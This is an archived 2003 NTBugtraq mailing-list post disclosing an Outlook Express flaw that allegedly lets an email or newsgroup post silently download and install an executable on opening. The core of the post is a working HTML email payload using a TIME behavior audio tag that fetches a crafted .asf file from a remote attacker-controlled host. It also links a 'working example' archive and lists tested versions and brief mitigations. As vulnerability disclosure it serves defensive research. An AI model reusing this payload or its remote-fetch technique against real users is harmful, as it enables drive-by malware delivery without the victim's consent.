Restricted Zone: the OUTLOOK EXPRESS
http-equiv_at_excite.com
Date: 05/21/03
- Previous message: David F. Madrid: "Blue screen in Windows"
- Next in thread: Jeff Beckley: "Re: Restricted Zone: the OUTLOOK EXPRESS"
- Reply: Jeff Beckley: "Re: Restricted Zone: the OUTLOOK EXPRESS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Wed, 21 May 2003 11:55:34 -0000 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Tuesday, 20 May, 2003
Silent delivery and installation of an executable on a target
computer. No client input other than opening an email or newsgroup
post.
This can be achieved with the default setting of Outlook Express:
RESTRICTED ZONE.
Technically the following never worked, cannot work, shouldn't work.
But it does:
MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03 http://www..malware.com
<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio t:src="http://www.malware.com/freek.asf" />
</body></html>
What that does is invoke our freakish media file including our trusty
and battle-hardened 0s URL flip from within the html of an email or
newsgroup post on viewing, which ordinarily could never be done.
But it now appears that while custom-crafted media files fail,
modified third-party files [whatever that means] function according
to plan. Specifically audio + *.asf. Our 0s URL flip points to our
file on the remote server and automatically forces our download as
instructed. Couple that with the most recent flood-like functionality
of the iframe: http://www.securityfocus.com/archive/1/321662 and
that's the end of that.
Tested on:
Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]
First Step Working Example:
http://www.malware.com/but.its.free.zip
Notes:
1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
WebBrowser Control Embedded Media Player File Vulnerability ':
http://www.securityfocus.com/bid/4343 which appears to never have
been patched.
2. disable scripting in the media player [if it helps]
3. do not be lured into opening email and newsgroup posts from
untrustworthy sources
End Call
-- http://www.malware.com oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo EXECUTIVE SEMINAR: "Information Security and the Disappearing Perimeter" Join Peter S. Tippett, PhD, M.D., the industry's foremost authority on network security, and TruSecure for a free breakfast seminar on "The Impact of the Disappearing Perimeter." Learn how you can proactively protect your organization against today's newest threats, including those from remote users, business partners and wireless. To register, and to view the full list of dates and cities, click below or call 1-888-396-8348. http://www.trusecure.com/offer/s0096/ oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
- Previous message: David F. Madrid: "Blue screen in Windows"
- Next in thread: Jeff Beckley: "Re: Restricted Zone: the OUTLOOK EXPRESS"
- Reply: Jeff Beckley: "Re: Restricted Zone: the OUTLOOK EXPRESS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
